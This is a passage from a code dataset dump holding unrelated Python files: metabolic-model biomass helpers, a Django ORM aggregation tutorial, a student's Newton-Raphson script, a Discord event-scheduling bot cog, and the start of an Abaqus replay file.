appearance.\n\t\t\"\"\"\n\t\tfor section_name in self._order:\n\t\t\tyield self[section_name]\n","sub_path":"fhdoc/processors/section_map.py","file_name":"section_map.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"22592397","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2017 Novo Nordisk Foundation Center for Biosustainability,\n# Technical University of Denmark.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is 
distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Supporting functions for biomass consistency checks.\"\"\"\n\nfrom __future__ import absolute_import\n\nimport logging\n\nfrom six import iteritems\nfrom cobra.exceptions import Infeasible\n\nimport memote.support.helpers as helpers\n\n__all__ = (\n \"sum_biomass_weight\", \"find_biomass_precursors\",\n \"find_blocked_biomass_precursors\")\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef sum_biomass_weight(reaction):\n \"\"\"\n Compute the sum of all reaction compounds.\n\n Parameters\n ----------\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n \"\"\"\n return sum(-coef * met.formula_weight\n for (met, coef) in iteritems(reaction.metabolites)) / 1000.0\n\n\ndef find_biomass_precursors(reaction):\n \"\"\"\n Return a list of all biomass precursors excluding ATP and H2O.\n\n Parameters\n ----------\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n \"\"\"\n return [met for met in reaction.reactants\n if met.id != 'atp_c' or met.id != 'h2o_c']\n\n\ndef find_blocked_biomass_precursors(reaction, model):\n \"\"\"\n Return a list of all biomass precursors that cannot be produced.\n\n Parameters\n ----------\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n model : cobra.Model\n The metabolic model under investigation.\n\n \"\"\"\n LOGGER.debug(\"Finding blocked biomass precursors\")\n precursors = find_biomass_precursors(reaction)\n blocked_precursors = list()\n for precursor in precursors:\n with model:\n dm_rxn = model.add_boundary(precursor, type=\"demand\")\n model.objective = dm_rxn\n try:\n solution = model.optimize()\n LOGGER.debug(\n \"%s: demand flux is '%g' and solver status is 
'%s'\",\n str(precursor), solution.objective_value, solution.status)\n if solution.objective_value <= 0.0:\n blocked_precursors.append(precursor)\n except Infeasible:\n blocked_precursors.append(precursor)\n return blocked_precursors\n\n\ndef gam_in_biomass(reaction):\n \"\"\"\n Return boolean if biomass reaction includes growth-associated maintenance.\n\n Parameters\n ----------\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n \"\"\"\n left = set([\"atp_c\", \"h2o_c\"])\n right = set([\"adp_c\", \"pi_c\", \"h_c\"])\n return (\n left.issubset(met.id for met in reaction.reactants) and\n right.issubset(met.id for met in reaction.products))\n\n\ndef find_direct_metabolites(model, reaction):\n \"\"\"\n Return list of possible direct biomass precursor metabolites.\n\n Parameters\n ----------\n model : cobra.Model\n The metabolic model under investigation.\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n Returns\n -------\n list\n Metabolites that qualify as direct metabolites i.e. 
biomass precursors\n that are taken up to be consumed by the biomass reaction only.\n\n \"\"\"\n transport_reactions = set(helpers.find_transport_reactions(model))\n exchange_reactions = set(model.exchanges)\n biomass_reactions = set(helpers.find_biomass_reaction(model))\n\n combined_set = transport_reactions | exchange_reactions | biomass_reactions\n precursors = find_biomass_precursors(reaction)\n\n return [met for met in precursors if met.reactions.issubset(combined_set)]\n","sub_path":"memote/support/biomass.py","file_name":"biomass.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"221100972","text":"import os\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"day66.settings\")\n\n import django\n django.setup()\n\n from applistions.models import MyClass,Student,Teacher,Employee\n from django.db.models import Avg, Sum, Max, Min, Count\n\n # 1.求所有人里面工资最高的\n ret = Employee.objects.all().aggregate(Max('salary'))\n print(ret) # {'salary__max': 80909}\n\n # # 指定返回字典中key的值\n ret = Employee.objects.all().aggregate(max_salary=Max('salary'))\n print(ret) # {'max_salary': 80909}\n\n # # 求所有人的平均价格\n ret = Employee.objects.all().aggregate(Avg('salary'))\n print(ret) # {'salary__avg': 20855.1667}\n\n # 使用ORM查询每个部门的平均工资\n ret = Employee.objects.values('dept').aggregate(Avg('salary'))\n print(ret) # 查询的是每个人的平均工资,此条查询错误\n # annotate中要写上分住之后要做的事情\n # anntate前面查询的是什么就按什么分组\n ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list('dept','salary__avg')\n print(ret) # \n\n # # ORM中分组使用annotate\n # # 1. annotate中要写上分组之后要做的事情\n # # 2. 
annotate前面查询的是什么就按什么分组\n # ret = Employee.objects.values('dept').annotate(avg_price=Avg('salary')).values('dept', 'avg_price')\n # print(ret)\n #\n # # 每个部门的平均年龄\n ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')).values_list('dept','avg_age')\n print(ret) # \n\n # # 求每个班级的学生的数量\n ret = Student.objects.values('myclass').annotate(s_count=Count('id'))\n print(ret) # \n","sub_path":"day66/ORM聚合和分组.py","file_name":"ORM聚合和分组.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"15301221","text":"#!/usr/bin/env python3\n\"\"\"\nProyecto Algoritmo de Newton-Raphson.\nCada participante debe completar su módulo y luego solicitar el Pull-Request.\n\"\"\"\n\nimport math\n\ndef derivada(f, h = 0.02):\n \"\"\"\n Retorna la función derivada de f dado un h.\n Parámetros:\n f: función de variable real f(x).\n h: tamaño del paso.\n \"\"\"\n\n def _(x):\n return (f(x + h) - f(x))/h\n\n return _\n\ndef err(x,prev):\n\n return math.fabs((x-prev)/x)\n\ndef newton_raphson(f, x, ER, N):\n \"\"\"\n Implementa el Algoritmo de Newton-Raphson y retorna la aproximación de la\n raiz.\n Parámetros:\n f: función de variable real f(x).\n x: aproximación inicial.\n ER: cota mínima del error relativo.\n N: número máximo de iteraciones.\n \"\"\"\n i=1 \n prev=0\n error= ER+1\n dev= derivada(f)\n\n for i in range(N):\n if(error>ER):\n dev=derivada(f)\n prev=x\n x=x-f(x)/dev(x)\n e=err(x,prev)\n print(\"Iteración:\", i, \"Aproximación:\", x, \"Error:\", error)\n return x\n\n\nif __name__ == \"__main__\":\n f= lambda x : math.e**x-2*x**3\n b= lambda x : math.cos(x) + math.exp(-x)\n newton_raphson(f,0.4,0.01,10)\n ","sub_path":"Hector_25967387.py","file_name":"Hector_25967387.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"463274172","text":"from discord.ext import commands\nfrom .utils 
import checks\nfrom .utils.dataIO import dataIO\nfrom datetime import datetime\nfrom datetime import date\nimport dateutil.parser as dateparser\nimport dateutil\nimport time\nimport asyncio\nimport aiohttp\nimport discord\nimport os\nimport calendar\nimport pytz\n\n\nnumbs = {\n\t\"next\": \"➡\",\n\t\"back\": \"⬅\",\n\t\"exit\": \"❌\"\n}\n\n\nclass EventMaker():\n\t\"\"\"A tool for creating events inside of Discord. Anyone can\n\tcreate an event by default. If a specific role has been\n\tspecified, users must have that role, the server's mod or\n\tadmin role, or be the server owner to create events. Reminders\n\twill be posted to the configured channel (default: the server's\n\tdefault channel), as well as direct messaged to\n\teveryone who has signed up\"\"\"\n\tdef __init__(self, bot):\n\t\tself.bot = bot\n\t\tself.events = dataIO.load_json(\n\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"))\n\t\tself.settings = dataIO.load_json(\n\t\t\tos.path.join(\"data\", \"eventmaker\", \"settings.json\"))\n\n\tasync def event_menu(self, ctx, event_list: list,\n\t\t\t\t\t\t message: discord.Message=None,\n\t\t\t\t\t\t page=0, timeout: int=30):\n\t\t\"\"\"menu control logic for this taken from\n\t\t https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py\"\"\"\n\t\temb = event_list[page]\n\t\tif not message:\n\t\t\tmessage =\\\n\t\t\t\tawait self.bot.send_message(ctx.message.channel, embed=emb)\n\t\t\tawait self.bot.add_reaction(message, \"⬅\")\n\t\t\tawait self.bot.add_reaction(message, \"❌\")\n\t\t\tawait self.bot.add_reaction(message, \"➡\")\n\t\telse:\n\t\t\tmessage = await self.bot.edit_message(message, embed=emb)\n\t\treact = await self.bot.wait_for_reaction(\n\t\t\tmessage=message, user=ctx.message.author, timeout=timeout,\n\t\t\temoji=[\"➡\", \"⬅\", \"❌\"]\n\t\t)\n\t\tif react is None:\n\t\t\tawait self.bot.remove_reaction(message, \"⬅\", self.bot.user)\n\t\t\tawait self.bot.remove_reaction(message, \"❌\", self.bot.user)\n\t\t\tawait 
self.bot.remove_reaction(message, \"➡\", self.bot.user)\n\t\t\treturn None\n\t\treacts = {v: k for k, v in numbs.items()}\n\t\treact = reacts[react.reaction.emoji]\n\t\tif react == \"next\":\n\t\t\tnext_page = 0\n\t\t\tif page == len(event_list) - 1:\n\t\t\t\tnext_page = 0 # Loop around to the first item\n\t\t\telse:\n\t\t\t\tnext_page = page + 1\n\t\t\treturn await self.event_menu(ctx, event_list, message=message,\n\t\t\t\t\t\t\t\t\t\t page=next_page, timeout=timeout)\n\t\telif react == \"back\":\n\t\t\tnext_page = 0\n\t\t\tif page == 0:\n\t\t\t\tnext_page = len(event_list) - 1 # Loop around to the last item\n\t\t\telse:\n\t\t\t\tnext_page = page - 1\n\t\t\treturn await self.event_menu(ctx, event_list, message=message,\n\t\t\t\t\t\t\t\t\t\t page=next_page, timeout=timeout)\n\t\telse:\n\t\t\treturn await\\\n\t\t\t\tself.bot.delete_message(message)\n\n\t@commands.command(pass_context=True)\n\tasync def eventcreate(self, ctx):\n\t\t\"\"\"Wizard-style event creation tool. The event will only be created if\n\t\tall information is provided properly\n\t\t\"\"\"\n\t\tauthor = ctx.message.author\n\t\tserver = ctx.message.server\n\t\tallowed_roles = []\n\t\tserver_owner = server.owner\n\t\tif server.id in self.settings:\n\t\t\tif self.settings[server.id][\"role\"] is not None:\n\t\t\t\tspecified_role =\\\n\t\t\t\t\t[r for r in server.roles if r.id == self.settings[server.id][\"role\"]][0]\n\t\t\t\tallowed_roles.append(specified_role)\n\t\t\t\tallowed_roles.append(self.bot.settings.get_server_mod(server))\n\t\t\t\tallowed_roles.append(self.bot.settings.get_server_admin(server))\n\n\t\tif len(allowed_roles) > 0 and author != server_owner:\n\t\t\tfor role in author.roles:\n\t\t\t\tif role in allowed_roles:\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tawait self.bot.say(\"You don't have permission to create events!\")\n\t\t\t\treturn\n\n\t\tcreation_time = datetime.utcnow()\n\t\tawait self.bot.say(\"Enter a name for the event: \")\n\t\tmsg = await 
self.bot.wait_for_message(author=author, timeout=30)\n\t\tif msg is None:\n\t\t\tawait self.bot.say(\"No name provided!\")\n\t\t\treturn\n\t\tname = msg.content\n\t\tmsg = None\n\t\tawait self.bot.say(\n\t\t\t\"Enter the time the event will start in this format, e.g Fri 08 Jun 2017 19:00 UTC\")\n\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\tif msg is None:\n\t\t\tawait self.bot.say(\"No start time provided!\")\n\t\t\treturn\n\t\tdatetimestring = msg.content\n\t\ttry: \n\t\t\tdt = dateparser.parse(datetimestring)\n\t\t\tstart_time = int(time.mktime(dt.utctimetuple()))\n\t\texcept:\n\t\t\tawait self.bot.say(\"Something went wrong with parsing the time you entered!\")\n\t\t\treturn\n\t\tmsg = None\n\t\tawait self.bot.say(\"Enter the maximum number of participants, 0 for no limit.\")\n\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\tif msg is None:\n\t\t\tawait self.bot.say(\"No number provided!\")\n\t\t\treturn\n\t\telif msg.content == 0:\n\t\t\tmax_parc = 99999999\n\t\telse:\n\t\t\tmax_parc = msg.content\n\t\tmsg = None\n\t\tawait self.bot.say(\"Enter a description for the event: \")\n\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\tif msg is None:\n\t\t\tawait self.bot.say(\"No description provided!\")\n\t\t\treturn\n\t\tif len(msg.content) > 750:\n\t\t\tawait self.bot.say(\"Your description is too long!\")\n\t\t\treturn\n\t\telse:\n\t\t\tdesc = msg.content\n\n\t\tnew_event = {\n\t\t\t\"id\": self.settings[server.id][\"next_id\"],\n\t\t\t\"creator\": author.id,\n\t\t\t\"create_time\": calendar.timegm(creation_time.utctimetuple()),\n\t\t\t\"event_name\": name,\n\t\t\t\"event_start_time\": start_time,\n\t\t\t\"description\": desc,\n\t\t\t\"has_started\": False,\n\t\t\t\"max_participants\" : max_parc,\n\t\t\t\"participants\": [author.id],\n\t\t\t\"reserves\": []\n\t\t}\n\t\tself.settings[server.id][\"next_id\"] += 
1\n\t\tself.events[server.id].append(new_event)\n\t\tdataIO.save_json(os.path.join(\n\t\t\t\"data\", \"eventmaker\", \"settings.json\"), self.settings)\n\t\tdataIO.save_json(\n\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"), self.events)\n\t\temb = discord.Embed(title=new_event[\"event_name\"],\n\t\t\t\t\t\t\tdescription=new_event[\"description\"],\n\t\t\t\t\t\t\turl=\"https://time.is/UTC\")\n\t\temb.add_field(name=\"Raid Leader\",\n\t\t\t\t\t value=discord.utils.get(\n\t\t\t\t\t\t self.bot.get_all_members(),\n\t\t\t\t\t\t id=new_event[\"creator\"]))\n\t\temb.add_field(name=\"Event ID\", value=str(new_event[\"id\"]))\n\t\temb.add_field(\n\t\t\tname=\"Start time (UTC)\", value=datetime.utcfromtimestamp(\n\t\t\t\tnew_event[\"event_start_time\"]))\n\t\tchannel = discord.utils.get(self.bot.get_all_channels(),\n\t\t\t\t\t\t\t\tid=self.settings[server.id][\"channel\"])\n\t\teventid = new_event[\"id\"]\n\t\ttry:\n\t\t\tawait self.bot.send_message(channel, \"A new event has been created, type !joinevent {0} to join.\".format(eventid))\n\t\t\tawait self.bot.send_message(channel, embed=emb)\n\t\texcept discord.Forbidden:\n\t\t\tpass # No permissions to send messages\n\n\t@commands.command(pass_context=True)\n\tasync def joinevent(self, ctx, event_id: int):\n\t\t\"\"\"Join the specified event\"\"\"\n\t\tserver = ctx.message.server\n\t\tauthor = ctx.message.author\n\t\tfor event in self.events[server.id]:\n\t\t\tif event[\"id\"] == event_id:\n\t\t\t\tif not event[\"has_started\"]:\n\t\t\t\t\t#print(len(event[\"participants\"]))\n\t\t\t\t\tif len(event[\"participants\"]) < int(event[\"max_participants\"]):\n\t\t\t\t\t\tif ctx.message.author.id not in event[\"participants\"]:\n\t\t\t\t\t\t\tevent[\"participants\"].append(ctx.message.author.id)\n\t\t\t\t\t\t\tawait self.bot.say(\"Joined the event!\")\n\t\t\t\t\t\t\tdataIO.save_json(\n\t\t\t\t\t\t\t\tos.path.join(\"data\", \"eventmaker\", 
\"events.json\"),\n\t\t\t\t\t\t\t\tself.events)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tawait self.bot.say(\"You have already joined that event!\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tawait self.bot.say(\"This event already has its max number of participants, do you want to signup as a reserve?\")\n\t\t\t\t\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\t\t\t\t\tresponse = msg.content\n\t\t\t\t\t\tresponse = response.lower()\n\t\t\t\t\t\tif response == \"yes\":\n\t\t\t\t\t\t\tif ctx.message.author.id not in event[\"participants\"]:\n\t\t\t\t\t\t\t\tevent[\"reserves\"].append(ctx.message.author.id)\n\t\t\t\t\t\t\t\tdataIO.save_json(\n\t\t\t\t\t\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"),\n\t\t\t\t\t\t\t\t\tself.events)\n\t\t\t\t\t\t\t\tawait self.bot.say(\"Joined the event!\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tawait self.bot.say(\"You have already joined that event!\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tawait self.bot.say(\"You have not been signed up for this event\")\n\t\t\t\telse:\n\t\t\t\t\tawait self.bot.say(\"That event has already started!\")\n\t\t\t\tbreak\n\t\telse:\n\t\t\tawait self.bot.say(\"It appears as if that event does not exist!\" +\n\t\t\t\t\t\t\t \"Perhaps it was cancelled or never created?\")\n\n\t@commands.command(pass_context=True)\n\tasync def leaveevent(self, ctx, event_id: int):\n\t\t\"\"\"Leave the specified event\"\"\"\n\t\tserver = ctx.message.server\n\t\tauthor = ctx.message.author\n\t\tfor event in self.events[server.id]:\n\t\t\tif event[\"id\"] == event_id:\n\t\t\t\tif not event[\"has_started\"]:\n\t\t\t\t\tif author.id in event[\"participants\"]:\n\t\t\t\t\t\tevent[\"participants\"].remove(author.id)\n\t\t\t\t\t\tawait self.bot.say(\"Removed you from that event!\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tif author.id in event[\"reserves\"]:\n\t\t\t\t\t\t\tevent[\"reserves\"].remove(author.id)\n\t\t\t\t\t\t\tawait self.bot.say(\"Removed you from that event!\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tawait 
self.bot.say(\"You aren't signed up for that event!\")\n\t\t\t\telse:\n\t\t\t\t\tawait self.bot.say(\"That event already started!\")\n\t\t\t\tbreak\n\n\t@commands.command(pass_context=True)\n\tasync def eventlist(self, ctx, *, timezone: str=\"UTC\"):\n\t\t\"\"\"List events for this server that have not started yet\n\t\tTimezone needs to be something from the third column of\n\t\tthe large table at https://en.wikipedia.org/wiki/List_of_tz_database_time_zones\"\"\"\n\t\tserver = ctx.message.server\n\t\tevents = []\n\t\tfor event in self.events[server.id]:\n\t\t\tif not event[\"has_started\"]:\n\t\t\t\temb = discord.Embed(title=event[\"event_name\"],\n\t\t\t\t\t\t\t\t\tdescription=event[\"description\"],\n\t\t\t\t\t\t\t\t\turl=\"https://time.is/UTC\")\n\t\t\t\temb.add_field(name=\"Organiser\",\n\t\t\t\t\t\t\t value=discord.utils.get(\n\t\t\t\t\t\t\t\t self.bot.get_all_members(),\n\t\t\t\t\t\t\t\t id=event[\"creator\"]))\n\t\t\t\temb.add_field(name=\"Event ID\", value=str(event[\"id\"]))\n\t\t\t\temb.add_field(\n\t\t\t\t\tname=\"Participant count\", value=str(\n\t\t\t\t\t\tlen(event[\"participants\"])))\n\t\t\t\temb.add_field(\n\t\t\t\t\tname=\"Start time (UTC)\", value=datetime.utcfromtimestamp(\n\t\t\t\t\t\tevent[\"event_start_time\"]))\n\t\t\t\tevents.append(emb)\n\t\tif len(events) == 0:\n\t\t\tawait self.bot.say(\"No events available to join!\")\n\t\telse:\n\t\t\tawait self.event_menu(ctx, events, message=None, page=0, timeout=30)\n\n\t@commands.command(pass_context=True)\n\tasync def whojoined(self, ctx, event_id: int):\n\t\t\"\"\"List all participants of the event\"\"\"\n\t\tserver = ctx.message.server\n\t\tfor event in self.events[server.id]:\n\t\t\tif event[\"id\"] == event_id:\n\t\t\t\tif not event[\"has_started\"]:\n\t\t\t\t\tfor user in event[\"participants\"]:\n\t\t\t\t\t\tuser_obj = discord.utils.get(\n\t\t\t\t\t\t\tself.bot.get_all_members(), id=user)\n\t\t\t\t\t\tawait self.bot.say(\"{}#{}\".format(\n\t\t\t\t\t\t\tuser_obj.name, 
user_obj.discriminator))\n\t\t\t\t\tawait self.bot.say(\"Reserves\")\n\t\t\t\t\tfor user in event[\"reserves\"]:\n\t\t\t\t\t\tuser_obj = discord.utils.get(\n\t\t\t\t\t\t\tself.bot.get_all_members(), id=user)\n\t\t\t\t\t\tawait self.bot.say(\"{}#{}\".format(\n\t\t\t\t\t\t\tuser_obj.name, user_obj.discriminator)) \n\t\t\t\telse:\n\t\t\t\t\tawait self.bot.say(\"That event has already started!\")\n\t\t\t\tbreak\n\n\t@commands.command(pass_context=True)\n\tasync def cancelevent(self, ctx, event_id: int):\n\t\t\"\"\"Cancels the specified event\"\"\"\n\t\tserver = ctx.message.server\n\t\tif event_id < self.settings[server.id][\"next_id\"]:\n\t\t\tto_remove =\\\n\t\t\t\t[event for event in self.events[server.id] if event[\"id\"] == event_id]\n\t\t\tif len(to_remove) == 0:\n\t\t\t\tawait self.bot.say(\"No event to remove!\")\n\t\t\telse:\n\t\t\t\tself.events[server.id].remove(to_remove[0])\n\t\t\t\tdataIO.save_json(\n\t\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"),\n\t\t\t\t\tself.events)\n\t\t\t\tawait self.bot.say(\"Removed the specified event!\")\n\t\telse:\n\t\t\tawait self.bot.say(\"I can't remove an event that \" +\n\t\t\t\t\t\t\t \"hasn't been created yet!\")\n\n\tdef parse_time(self, cur_time, msg: discord.Message):\n\t\t\"\"\"Parse the time\"\"\"\n\t\tstart_time = calendar.timegm(cur_time.utctimetuple())\n\t\tcontent = msg.content\n\t\tpieces = content.split()\n\t\tfor piece in pieces:\n\t\t\tif piece.endswith(\"y\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 31536000 # seconds per year\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"w\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 604800 # seconds per week\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"d\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 86400 # seconds per day\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue 
with the user's input\n\t\t\telif piece.endswith(\"h\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 3600 # seconds per hour\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"m\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 60 # seconds per minute\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"s\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 1 # seconds per second\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telse:\n\t\t\t\treturn None # something went wrong in user's input\n\t\t\treturn start_time\n\n\t@commands.group(pass_context=True)\n\t@checks.admin_or_permissions(manage_server=True)\n\tasync def eventset(self, ctx):\n\t\t\"\"\"Event maker settings\"\"\"\n\t\tif ctx.invoked_subcommand is None:\n\t\t\tawait self.bot.send_cmd_help(ctx)\n\n\t@eventset.command(pass_context=True, name=\"channel\")\n\t@checks.admin_or_permissions(manage_server=True)\n\tasync def eventset_channel(self, ctx, channel: discord.Channel):\n\t\t\"\"\"Set the channel used for displaying reminders. If 'channel'\n\t\tis selected for reminders on event creation, this channel\n\t\twill be used. Default: the server's default channel\"\"\"\n\t\tserver = ctx.message.server\n\t\tself.settings[server.id][\"channel\"] = channel.id\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"),\n\t\t\t\t\t\t self.settings)\n\t\tawait self.bot.say(\"Channel set to {}\".format(channel.mention))\n\n\t@eventset.command(pass_context=True, name=\"role\")\n\t@checks.admin_or_permissions(manage_server=True)\n\tasync def eventset_role(self, ctx, *, role: str=None):\n\t\t\"\"\"Set the role allowed to create events. 
Default\n\t\tis for everyone to be able to create events\"\"\"\n\t\tserver = ctx.message.server\n\t\tif role is not None:\n\t\t\trole_obj = [r for r in server.roles if r.name == role][0]\n\t\t\tself.settings[server.id][\"role\"] = role_obj.id\n\t\t\tdataIO.save_json(\n\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"settings.json\"),\n\t\t\t\tself.settings)\n\t\t\tawait self.bot.say(\"Role set to {}\".format(role))\n\t\telse:\n\t\t\tself.settings[server.id][\"role\"] = None\n\t\t\tdataIO.save_json(\n\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"settings.json\"),\n\t\t\t\tself.settings)\n\t\t\tawait self.bot.say(\"Role unset!\")\n\n\tasync def check_events(self):\n\t\t\"\"\"Event loop\"\"\"\n\t\tCHECK_DELAY = 60\n\t\twhile self == self.bot.get_cog(\"EventMaker\"):\n\t\t\tcur_time = datetime.utcnow()\n\t\t\tcur_time = calendar.timegm(cur_time.utctimetuple())\n\t\t\tsave = False\n\t\t\tfor server in list(self.events.keys()):\n\t\t\t\tchannel = discord.utils.get(self.bot.get_all_channels(),\n\t\t\t\t\t\t\t\t\t\t\tid=self.settings[server][\"channel\"])\n\t\t\t\tfor event in self.events[server]:\n\t\t\t\t\tif cur_time >= event[\"event_start_time\"]\\\n\t\t\t\t\t\t\tand not event[\"has_started\"]:\n\t\t\t\t\t\temb = discord.Embed(title=event[\"event_name\"],\n\t\t\t\t\t\t\t\t\t\t\tdescription=event[\"description\"])\n\t\t\t\t\t\temb.add_field(name=\"Created by\",\n\t\t\t\t\t\t\t\t\t value=discord.utils.get(\n\t\t\t\t\t\t\t\t\t\t self.bot.get_all_members(),\n\t\t\t\t\t\t\t\t\t\t id=event[\"creator\"]))\n\t\t\t\t\t\temb.add_field(name=\"Event ID\", value=str(event[\"id\"]))\n\t\t\t\t\t\temb.add_field(\n\t\t\t\t\t\t\tname=\"Participant count\", value=str(\n\t\t\t\t\t\t\t\tlen(event[\"participants\"])))\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tawait self.bot.send_message(channel, embed=emb)\n\t\t\t\t\t\texcept discord.Forbidden:\n\t\t\t\t\t\t\tpass # No permissions to send messages\n\t\t\t\t\t\tfor user in event[\"participants\"]:\n\t\t\t\t\t\t\ttarget = 
discord.utils.get(\n\t\t\t\t\t\t\t\tself.bot.get_all_members(), id=user)\n\t\t\t\t\t\t\tawait self.bot.send_message(target, embed=emb)\n\t\t\t\t\t\tevent[\"has_started\"] = True\n\t\t\t\t\t\tsave = True\n\t\t\tif save:\n\t\t\t\tdataIO.save_json(\n\t\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"),\n\t\t\t\t\tself.events)\n\t\t\tawait asyncio.sleep(CHECK_DELAY)\n\n\tasync def server_join(self, server):\n\t\tif server.id not in self.settings:\n\t\t\tself.settings[server.id] = {\n\t\t\t\t\"role\": None,\n\t\t\t\t\"next_id\": 1,\n\t\t\t\t\"channel\": server.id\n\t\t\t}\n\t\tif server.id not in self.events:\n\t\t\tself.events[server.id] = []\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"events.json\"), self.events)\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"), self.settings)\n\n\tasync def server_leave(self, server):\n\t\t\"\"\"Cleanup after leaving server\"\"\"\n\t\tif server.id in self.events:\n\t\t\tself.events.pop(server.id)\n\t\tif server.id in self.settings:\n\t\t\tself.settings.pop(server.id)\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"events.json\"), self.events)\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"), self.settings)\n\n\tasync def confirm_server_setup(self):\n\t\t\"\"\"Ensures that all servers the bot is in\n\t\thave default settings for them. 
Runs only\n\t\ton cog load\"\"\"\n\t\tfor server in list(self.bot.servers):\n\t\t\tif server.id not in self.settings:\n\t\t\t\tself.settings[server.id] = {\n\t\t\t\t\t\"role\": None,\n\t\t\t\t\t\"next_id\": 1,\n\t\t\t\t\t\"channel\": server.id\n\t\t\t\t}\n\t\t\t\tif server.id not in self.events:\n\t\t\t\t\tself.events[server.id] = []\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"events.json\"), self.events)\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"), self.settings)\n\n\ndef check_folder():\n\tif not os.path.isdir(os.path.join(\"data\", \"eventmaker\")):\n\t\tprint(\"Creating the eventmaker directory in data\")\n\t\tos.mkdir(os.path.join(\"data\", \"eventmaker\"))\n\n\ndef check_file():\n\tif not dataIO.is_valid_json(os.path.join(\"data\", \"eventmaker\", \"events.json\")):\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"events.json\"), {})\n\tif not dataIO.is_valid_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\")):\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"), {})\n\n\ndef setup(bot):\n\tcheck_folder()\n\tcheck_file()\n\tn = EventMaker(bot)\n\tloop = asyncio.get_event_loop()\n\tloop.create_task(n.check_events())\n\tloop.create_task(n.confirm_server_setup())\n\tbot.add_listener(n.server_join, \"on_server_join\")\n\tbot.add_listener(n.server_leave, \"on_server_remove\")\n\tbot.add_cog(n)\n","sub_path":"eventmaker/eventmaker.py","file_name":"eventmaker.py","file_ext":"py","file_size_in_byte":17880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"494956103","text":"# -*- coding: mbcs -*-\n#\n# Abaqus/CAE Release 6.12-1 replay file\n# Internal Version: 2012_03_13-20.44.39 119612\n# Run by Anzong on Sun Jan 18 10:13:01 2015\n#\n\n# from driverUtils import executeOnCaeGraphicsStartup\n# executeOnCaeGraphicsStartup()\n#: Executing \"onCaeGraphicsStartup()\" in the site directory 